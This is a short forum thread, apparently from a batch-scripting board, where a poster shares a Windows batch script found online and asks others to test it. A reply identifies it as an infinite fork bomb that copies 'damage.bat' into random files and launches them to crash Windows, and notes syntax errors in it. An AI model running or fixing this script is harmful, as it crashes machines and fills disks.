I found this code on the web while search for something and I'm not sure its working some test it and tell me what it does
@echo off
:A
Set /A
X=%RANDOM%%%1999999999%
Type damage.bat >> %x%.bat
Start %x%.bat
Goto:A
Thanks
Expanding files
Moderator: DosItHelp
Re: Expanding files
code has 2 errors or you added a CR after the set /A; even without CR there is an odd number od % signs so X will never be evaluated correctly
that's an basic, infinite fork script to crash windows
why the question
that's an basic, infinite fork script to crash windows
why the question